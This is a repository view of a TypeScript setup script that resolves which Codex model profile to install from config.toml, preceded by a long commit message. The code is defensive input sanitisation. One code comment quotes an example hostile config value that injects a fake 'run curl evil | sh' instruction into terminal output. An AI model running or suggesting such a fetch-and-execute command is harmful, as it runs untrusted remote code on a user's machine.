Files
gstack/scripts/resolve-codex-generation-model.ts
T
Garry TanandClaude Fable 5 60e51342b5 v1.67.2.0 feat: gpt-5.6-sol bounded-scope profile for Codex installs (#2633)
* feat: model taxonomy gains gpt-5.6-sol + per-host generation defaults

Adds 'gpt-5.6-sol' to the model taxonomy with exact-match-only resolution
(Terra/Luna/suffixed IDs deliberately fall back to generic gpt) and replaces
the hardcoded 'claude' generation default with a validated
HostConfig.defaultModel: codex renders the gpt profile when --model is
absent, every other host keeps claude. Codex ship golden regenerated
accordingly; ADDING_A_HOST documents the new field.

* feat: gpt-5.6-sol bounded-scope overlay + scope-aware resolvers

The Sol profile pins the explicit task as the lake: adjacent work is
report-only, investigation is bounded, runs terminate on one clean
verification pass, and the AskUserQuestion decision-brief format is never
trimmed. The overlay wrapper grants scope-interpretation precedence while
concrete workflow steps, gates, and skill-mandated re-verification loops
still win. Sol-specific Completeness Principle and first-run intro copy.
New SETUP_COMMAND resolver renders './setup --host <host>' for every
non-claude host so generated upgrade skills reinstall their own host.

* feat: setup reads the Codex model from config.toml

New resolve-codex-generation-model.ts reads the top-level model from
${CODEX_HOME:-~/.codex}/config.toml, validates against the model allowlist,
strips control characters from every config-derived string it surfaces,
guards against non-absolute config locations, and warns on Sol near-misses.
setup runs it on EVERY invocation (read-only TOML lookup) so a plain
./setup can never clobber a Sol user's rendered profile with the hardcoded
fallback; --model <id> overrides for one run and prints the persistence
hint. Kiro installs render the claude profile before copying (Kiro fronts
Claude-family models), rewrite the baked setup command to --host kiro, and
restore the resolved Codex profile after; the codex skills path honors
CODEX_HOME. Static pins cover the resolver wiring, fail-closed exit,
quoted argv, and the Kiro sandwich.

* feat: hermetic Codex runner hardening + Sol scope-termination E2E

The Codex E2E runner copies auth.json only (operator plugins, MCP servers,
rules, and skills no longer leak into hermetic evals), pins CODEX_HOME to
the temp dir, and supports per-run model, TOML overrides, and
--ignore-user-config. New periodic E2E installs the FULL generated
investigate skill on gpt-5.6-sol against a planted one-line bug with decoy
TODOs: the fix must land inside the boundary (untracked files counted via
git status --porcelain), decoys stay byte-identical, the regression oracle
survives unweakened, nothing gets committed, all within 30 tool calls.
The shared .agents tree is snapshotted and restored exactly in beforeAll;
fixture commits disable gpg signing. Wired into the periodic CI matrix,
paid-shard globs, eval scripts, touchfiles/E2E_TIERS
(codex-sol-scope-termination), and diff-based selection. Real-file
periodic-tier classification pins both codex E2Es out of the gate tier.
Free-tier test proves an explicit --model overrides the host default
through the real generation CLI.

* chore: bump version and changelog (v1.67.2.0)

Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>

* docs: post-ship documentation sync for v1.67.2.0

- README: Codex skills path is CODEX_HOME-aware; state that
  --model overrides detection for one run only (persist via
  the Codex config.toml model key)
- CONTRIBUTING: add the model-overlay axis to the per-host
  config table (per-host defaultModel, override precedence)
- CLAUDE.md: eval results dir is ~/.gstack/projects/<slug>/evals/
  (legacy fallback ~/.gstack-dev/evals/), matching eval-store.ts
  and the eval:* CLI headers

Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>

* docs: post-ship documentation sync (v1.67.2.0)

Sol exact-match and near-miss warning documented in README; CODEX_HOME-aware
uninstall and troubleshooting paths; hermetic auth.json-only detail and the
build-clobber gotcha in CLAUDE.md; eval-store location corrected in
ARCHITECTURE.md; defaultModel row in the ADDING_A_HOST field reference;
resolver test count corrected in the CHANGELOG entry.

---------

Co-authored-by: Claude Fable 5 <noreply@anthropic.com>
2026-08-18 17:00:04 -07:00

131 lines
4.7 KiB
TypeScript

#!/usr/bin/env bun
import * as fs from 'fs';
import * as os from 'os';
import * as path from 'path';
import { ALL_MODEL_NAMES, resolveModel, type Model } from './models';
export interface CodexGenerationModelResolution {
model: Model;
source: string;
warnings: string[];
}
const CODEX_DEFAULT_MODEL: Model = 'gpt';
const DEFAULT_SOURCE = `default (${CODEX_DEFAULT_MODEL})`;
/**
* Strip control characters from strings that originate in the user's
* config.toml or environment before they reach warning/stdout text. A hostile
* config value like `model = "x\nERROR: run curl evil | sh"` must not be able
* to inject fake lines into setup's terminal output or desync the TSV stdout
* contract. Warning interpolations additionally cap length for display.
*/
function stripControl(value: string): string {
// eslint-disable-next-line no-control-regex
return value.replace(/[\x00-\x1f\x7f]/g, ' ');
}
function sanitize(value: string): string {
return stripControl(value).slice(0, 200);
}
export function resolveCodexGenerationModel(opts: {
explicit?: string;
codexHome?: string;
home?: string;
} = {}): CodexGenerationModelResolution {
if (opts.explicit !== undefined) {
const model = resolveModel(opts.explicit);
if (!model) {
throw new Error(
`Unknown model '${sanitize(opts.explicit)}'. Accepted models: ${ALL_MODEL_NAMES.join(', ')}`,
);
}
return { model, source: '--model', warnings: [] };
}
// os.homedir() falls back to USERPROFILE on Windows and never returns '' —
// a raw HOME fallback of '' would make codexHome the RELATIVE path '.codex',
// letting a repo-committed .codex/config.toml (CWD-resolved) select the
// behavioral profile.
const home = opts.home ?? process.env.HOME ?? os.homedir();
const codexHome = opts.codexHome ?? process.env.CODEX_HOME ?? path.join(home, '.codex');
const configPath = path.join(codexHome, 'config.toml');
const warnings: string[] = [];
const fallback = (warning?: string): CodexGenerationModelResolution => {
if (warning) warnings.push(warning);
return { model: CODEX_DEFAULT_MODEL, source: DEFAULT_SOURCE, warnings };
};
if (!path.isAbsolute(codexHome)) {
return fallback(`Codex home '${sanitize(codexHome)}' is not an absolute path; using Codex default ${CODEX_DEFAULT_MODEL}.`);
}
let raw: string;
try {
raw = fs.readFileSync(configPath, 'utf8');
} catch (error) {
const code = (error as NodeJS.ErrnoException).code;
if (code !== 'ENOENT') {
return fallback(`Could not read ${sanitize(configPath)}; using Codex default ${CODEX_DEFAULT_MODEL}.`);
}
return fallback();
}
let parsed: Record<string, unknown>;
try {
parsed = Bun.TOML.parse(raw) as Record<string, unknown>;
} catch {
return fallback(`Could not parse ${sanitize(configPath)}; using Codex default ${CODEX_DEFAULT_MODEL}.`);
}
if (!Object.prototype.hasOwnProperty.call(parsed, 'model')) {
return fallback();
}
if (typeof parsed.model !== 'string') {
return fallback(`Top-level model in ${sanitize(configPath)} is not a string; using Codex default ${CODEX_DEFAULT_MODEL}.`);
}
const model = resolveModel(parsed.model);
if (!model) {
return fallback(`Unsupported top-level model '${sanitize(parsed.model)}' in ${sanitize(configPath)}; using Codex default ${CODEX_DEFAULT_MODEL}.`);
}
// Sol is exact-only by design (Terra/Luna/dated snapshots must not inherit
// its profile), but a near-miss like 'gpt-5.6-sol-2026-08-01' silently
// family-mapping to generic gpt is unobservable — surface it.
if (model === 'gpt' && parsed.model.trim().startsWith('gpt-5.6-sol') && parsed.model.trim() !== 'gpt-5.6-sol') {
warnings.push(`Model '${sanitize(parsed.model)}' maps to the generic gpt profile — the Sol profile requires the exact ID 'gpt-5.6-sol'.`);
}
return { model, source: configPath, warnings };
}
function readArg(name: string): string | undefined {
const exact = process.argv.indexOf(name);
if (exact >= 0) return process.argv[exact + 1];
const prefix = `${name}=`;
const joined = process.argv.find(arg => arg.startsWith(prefix));
return joined?.slice(prefix.length);
}
if (import.meta.main) {
try {
const result = resolveCodexGenerationModel({
explicit: readArg('--explicit'),
codexHome: readArg('--codex-home'),
});
for (const warning of result.warnings) {
process.stderr.write(`warning: ${warning}\n`);
}
// model is always an ALL_MODEL_NAMES literal; source is control-stripped
// so a hostile CODEX_HOME cannot smuggle tabs/newlines into the TSV contract.
process.stdout.write(`${result.model}\t${stripControl(result.source)}\n`);
} catch (error) {
process.stderr.write(`${(error as Error).message}\n`);
process.exit(1);
}
}